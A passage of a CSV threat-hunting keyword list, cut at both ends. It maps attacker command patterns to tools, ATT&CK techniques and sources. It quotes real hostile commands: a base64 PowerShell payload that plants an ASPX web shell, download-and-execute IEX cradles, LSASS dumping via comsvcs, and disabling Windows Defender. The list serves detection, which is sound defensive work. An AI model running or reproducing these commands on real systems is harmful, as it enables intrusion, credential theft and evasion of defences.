JABhAD0AIgBQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBCAEUAWgBXAEoAMQBaAHoAMABpAGQASABKADEAWgBTAEkAZwBkAG0ARgBzAGEAVwBSAGgAZABHAFYAUwBaAFgARgAxAFoAWABOADAAUABTAEoAbQBZAFcAeAB6AFoAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFIARwBsAGgAWgAyADUAdgBjADMAUgBwAFkAMwBNAGkASQBDAFUAKwBEAFEAbwA4AEoAVQBBAGcAUwBXADEAdwBiADMASgAwAEkARQA1AGgAYgBXAFYAegBjAEcARgBqAFoAVAAwAGkAVQAzAGwAegBkAEcAVgB0AEwAawBsAFAASQBpAEEAbABQAGcAMABLAFAAQwBWAEEASQBFAGwAdABjAEcAOQB5AGQAQwBCAE8AWQBXADEAbABjADMAQgBoAFkAMgBVADkASQBsAE4ANQBjADMAUgBsAGIAUwBJAGcASgBUADQATgBDAGoAdwBsAFEAQwBCAEoAYgBYAEIAdgBjAG4AUQBnAFQAbQBGAHQAWgBYAE4AdwBZAFcATgBsAFAAUwBKAFQAZQBYAE4AMABaAFcAMAB1AFUAbgBWAHUAZABHAGwAdABaAFMANQBUAFoAWABKAHAAWQBXAHgAcABlAG0ARgAwAGEAVwA5AHUATABrAFoAdgBjAG0AMQBoAGQASABSAGwAYwBuAE0AdQBRAG0AbAB1AFkAWABKADUASQBpAEEAbABQAGcAMABLAFAASABOAGoAYwBtAGwAdwBkAEMAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBqADQATgBDAG4AQgB5AGIAMwBSAGwAWQAzAFIAbABaAEMAQgB6AGQASABKAHAAYgBtAGMAZwBSAFgAaABqAGEARwBGAHUAWgAyAFYAUwBkAFcANQAwAGEAVwAxAGwASwBDAGsATgBDAG4AcwBOAEMAZwBsAHkAWgBYAFIAMQBjAG0ANABnAGMAeQA1AFUAWgBYAGgAMABMAGwAUgB2AFUAMwBSAHkAYQBXADUAbgBLAEMAawA3AEQAUQBwADkARABRAHAAdwBjAG0AOQAwAFoAVwBOADAAWgBXAFEAZwBkAG0AOQBwAFoAQwBCAEUAWQBYAFIAaABZAG0ARgB6AFoAUwBoAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAZwBiAFMAeABDAGEAVwA1AGgAYwBuAGwARwBiADMASgB0AFkAWABSADAAWgBYAEkAZwBZAGkAawBOAEMAbgBzAE4AQwBnAGsASgBiAFMANQBRAGIAMwBOAHAAZABHAGwAdgBiAGkAQQA5AEkARABBADcARABRAG8ASgBDAFcASQB1AFIARwBWAHoAWgBYAEoAcABZAFcAeABwAGUAbQBVAG8AYgBTAGsANwBEAFEAcAA5AEQAUQBwAHcAYwBtADkAMABaAFcATgAwAFoAV
wBRAGcAZABtADkAcABaAEMAQgBEAFgAMABOAHMAYQBXAE4AcgBLAEcAOQBpAGEAbQBWAGoAZABDAEIAegBaAFcANQBrAFoAWABJAHMASQBFAFYAMgBaAFcANQAwAFEAWABKAG4AYwB5AEIAbABLAFEAMABLAGUAdwAwAEsAQwBRAGwAQwBlAFgAUgBsAFcAMQAwAGcAVQB5AEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUARABiADIANQAyAFoAWABKADAATABrAFoAeQBiADIAMQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AUgBYAGgAagBhAEcARgB1AFoAMgBWAFMAZABXADUAMABhAFcAMQBsAEsAQwBrAHAATwB3ADAASwBDAFEAbABOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgBTAEEAOQBJAEcANQBsAGQAeQBCAE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBVAHkAawA3AEQAUQBvAEoAQwBVAEoAcABiAG0ARgB5AGUAVQBaAHYAYwBtADEAaABkAEgAUgBsAGMAaQBCAGkASQBEADAAZwBiAG0AVgAzAEkARQBKAHAAYgBtAEYAeQBlAFUAWgB2AGMAbQAxAGgAZABIAFIAbABjAGkAZwBwAE8AdwAwAEsAQwBRAGwARQBZAFgAUgBoAFkAbQBGAHoAWgBTAGgAdABMAEcASQBwAE8AdwAwAEsARABRAHAAOQBEAFEAbwA4AEwAMwBOAGoAYwBtAGwAdwBkAEQANABOAEMAagB4AG8AZABHADEAcwBQAGcAMABLAFAARwBaAHYAYwBtADAAZwBhAFcAUQA5AEkAbQBaAHYAYwBtADAAaQBJAEgASgAxAGIAbQBGADAAUABTAEoAegBaAFgASgAyAFoAWABJAGkASQBEADQATgBDAGoAeABoAGMAMwBBADYAVgBHAFYANABkAEUASgB2AGUAQwBCAHkAZABXADUAaABkAEQAMABpAGMAMgBWAHkAZABtAFYAeQBJAGkAQgBKAFIARAAwAGkAYwB5AEkAZwBWAG0ARgBzAGQAVwBVADkASQBpAEkAZwBhAFcANQB3AGQAWABRAGcAYwAzAFIANQBiAEcAVQA5AEkAbQBKAHYAYwBtAFIAbABjAGoAbwB3AGMASABnAGkATAB6ADQATgBDAGoAeABoAGMAMwBBADYAUQBuAFYAMABkAEcAOQB1AEkARQBsAEUAUABTAEoARABJAGkAQgB5AGQAVwA1AGgAZABEADAAaQBjADIAVgB5AGQAbQBWAHkASQBpAEIAVQBaAFgAaAAwAFAAUwBJAGkASQBFADkAdQBRADIAeABwAFkAMgBzADkASQBrAE4AZgBRADIAeABwAFkAMgBzAGkASQBDADgAKwBEAFEAbwA4AEwAMgBaAHYAYwBtADAAKwBEAFEAbwA4AEwAMgBKAHYAWgBIAGsAKwBEAFEAbwA4AEwAMgBoADAAYgBXAHcAKwAiADsAJABhAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQA7AHMAYwAgAC0AcABhAHQAaAAgACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAYQAuAHQAeAB0ACIAIAAtAHYAYQBsAHUAZQAgACQAYQAgAC0ARgBvAHIAYwBlADsAcwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAd
ABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #3","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc 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*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #4","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 
- TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell Invoke-WebRequest http*.bat *","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Powershell 
LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","10","8","N/A","N/A","N/A","N/A"
+"*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*powershell.exe -noninteractive -executionpolicy bypass ps lsass*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell.exe -noninteractive -executionpolicy bypass quser*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass 
Password1234*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*powershell_code_execution_invoke_assembly*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 
T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_collection_keylogger*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_collection_screenshot*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - 
T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_command_x64.ps1*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*powershell_command_x86.ps1*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*powershell_credentials_tokens*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework 
that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*powershell_encode_oneliner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*powershell_encode_oneliner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*powershell_encode_stager*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 